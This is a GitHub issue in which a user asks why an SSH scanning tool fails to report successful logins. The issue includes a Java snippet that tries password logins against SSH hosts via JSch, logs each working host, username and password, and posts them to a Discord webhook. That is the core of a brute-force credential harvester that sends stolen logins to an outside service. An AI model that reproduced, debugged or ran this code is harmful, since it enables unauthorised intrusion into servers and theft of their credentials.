Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

No connected status. #1

Open
Neyahd opened this issue Nov 16, 2024 · 0 comments
Open

No connected status. #1

Neyahd opened this issue Nov 16, 2024 · 0 comments

Comments

@Neyahd
Copy link

Neyahd commented Nov 16, 2024

Hello,The scanner does not print (verbose) data with a successful server. It does not send to the webhook or verbose.(I load my vps iprange and password.)

Eror can be in:
if (success) {
final int port = Integer.parseInt(p);
try {
final com.jcraft.jsch.Session session = this.jSch.getSession(username, host, port);
session.setPassword(password);
session.setConfig(this.properties);
session.setTimeout(Integer.parseInt(String.valueOf(this.configuration.get("timeout"))));
session.connect();
if (!(username + ":" + password).equals(this.falsePositive)) {
Logger.log(String.format("[%d] %s@%s:%d (password: %s) | Connected", Thread.currentThread().getId(), username, host, port, password));
if (!this.configuration.get("webhook").equals(""))
new DiscordWebhook((String) this.configuration.get("webhook")).sendWebhook(host, username, password, port);
}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant